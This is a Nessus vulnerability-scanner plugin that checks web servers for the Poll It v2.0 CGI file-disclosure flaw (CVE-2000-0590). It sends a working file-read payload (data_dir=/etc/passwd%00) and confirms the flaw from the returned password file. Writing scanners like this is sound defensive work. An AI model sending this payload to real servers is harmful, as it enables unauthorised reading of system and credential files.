
#
# This script was written by Thomas Reinke <reinke@securityspace.com>
#
# See the Nessus Scripts License for details
#
# Changes by rd :
#    - attempt to read /etc/passwd
#    - script_id
#    - script_bugtraq_id(1431);
#

if(description)
{
 script_id(10459);
 script_bugtraq_id(1431);
 script_version ("$Revision: 4334 $"); 
 script_cve_id("CVE-2000-0590");
 name = "Poll It v2.0 cgi";
 script_name(name);

 desc = "'Poll_It_SSI_v2.0.cgi' is installed. This CGI has
 a well known security flaw that lets an attacker retrieve any file from
 the remote system, e.g. /etc/passwd.

Solution:  remove 'Poll_It_SSI_v2.0.cgi' from /cgi-bin.

Risk factor : High";




 script_description(desc);

 summary = "Checks for the presence of /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi";
   
 script_summary(summary);

 script_category(ACT_GATHER_INFO);


 script_copyright("This script is Copyright (C) 2000 Thomas Reinke");

 family = "Web application abuses";
 script_family(family);
 script_dependencie("find_service.nes", "no404.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 
 exit(0);
}	  
  
#
# The script code starts here
#
include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);


if(get_port_state(port))
{
 foreach dir (cgi_dirs())
 {
 req = string(dir, "/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/passwd%00");
 req = http_get(item:req, port:port);
 r = http_keepalive_send_recv(port:port, data:req);
 if( r == NULL ) exit(0);
 if(egrep(pattern:".*root:.*:0:[01]:.*", string:r))
  {
   security_hole(port);
   exit(0);
  }
 }
}
